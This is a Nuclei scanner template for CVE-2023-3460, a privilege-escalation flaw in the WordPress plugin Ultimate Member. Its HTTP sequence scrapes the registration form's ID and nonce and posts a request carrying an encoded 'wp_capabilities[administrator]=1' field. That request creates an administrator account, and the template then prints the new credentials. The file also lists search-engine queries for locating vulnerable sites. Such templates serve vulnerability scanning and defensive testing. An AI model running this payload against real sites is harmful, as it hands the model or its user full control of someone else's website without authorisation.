nuclei-templates/http/cves/2023/CVE-2023-3460.yaml

id: CVE-2023-3460

info:
  name: Ultimate Member < 2.6.7 - Unauthenticated Privilege Escalation
  author: DhiyaneshDk
  severity: critical
  description: |
    The plugin does not prevent visitors from creating user accounts with arbitrary capabilities, effectively allowing attackers to create administrator accounts at will. This is actively being exploited in the wild.    
  reference:
    - https://github.com/gbrsh/CVE-2023-3460
    - https://nvd.nist.gov/vuln/detail/CVE-2023-3460
    - https://wpscan.com/vulnerability/694235c7-4469-4ffd-a722-9225b19e98d7
    - https://blog.wpscan.com/hacking-campaign-actively-exploiting-ultimate-member-plugin/
    - https://wordpress.org/plugins/ultimate-member/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-3460
    cwe-id: CWE-269
    epss-score: 0.00268
    cpe: cpe:2.3:a:ultimatemember:ultimate_member:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 4
    verified: true
    google-query: inurl:/wp-content/plugins/ultimate-member
    publicwww-query: /wp-content/plugins/ultimate-member
    vendor: ultimatemember
    product: ultimate_member
    framework: wordpress
  tags: cve,cve2023,wordpress,wp,wp-plugin,auth-bypass,intrusive,kev,wpscan

variables:
  username: "{{rand_base(6)}}"
  password: "{{rand_base(8)}}"
  email: "{{randstr}}@{{rand_base(5)}}.com"
  firstname: "{{rand_base(5)}}"
  lastname: "{{rand_base(5)}}"

http:
  - raw:
      - |
        GET /wp-content/plugins/ultimate-member/readme.txt HTTP/1.1
        Host: {{Hostname}}        
      - |
        GET /index.php/register/?{{version}} HTTP/1.1
        Host: {{Hostname}}        
      - |
        GET {{path}} HTTP/1.1
        Host: {{Hostname}}        
      - |
        POST {{path}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        user_login-{{formid}}={{username}}&user_email-{{formid}}={{email}}&user_password-{{formid}}={{password}}&confirm_user_password-{{formid}}={{password}}&first_name-{{formid}}={{firstname}}&last_name-{{formid}}={{lastname}}&form_id={{formid}}&um_request=&_wpnonce={{wpnonce}}&wp_c%C3%A0pabilities%5Badministrator%5D=1        

    matchers:
      - type: dsl
        dsl:
          - contains(to_lower(body_1), "ultimate member")
          - regex("wordpress_logged_in_[a-z0-9]{32}", header_4)
          - status_code_4 == 302
        condition: and

    extractors:
      - type: regex
        name: path
        part: location_2
        group: 1
        regex:
          - '([a-z:/.]+)'
        internal: true

      - type: regex
        name: version
        part: body_1
        group: 1
        regex:
          - '(?i)Stable.tag:\s?([\w.]+)'
        internal: true

      - type: regex
        name: formid
        part: body_3
        group: 1
        regex:
          - 'name="form_id" id="form_id_([0-9]+)"'
        internal: true

      - type: regex
        name: wpnonce
        part: body_3
        group: 1
        regex:
          - 'name="_wpnonce" value="([0-9a-z]+)"'
        internal: true

      - type: dsl
        dsl:
          - '"WP_USERNAME: "+ username'
          - '"WP_PASSWORD: "+ password'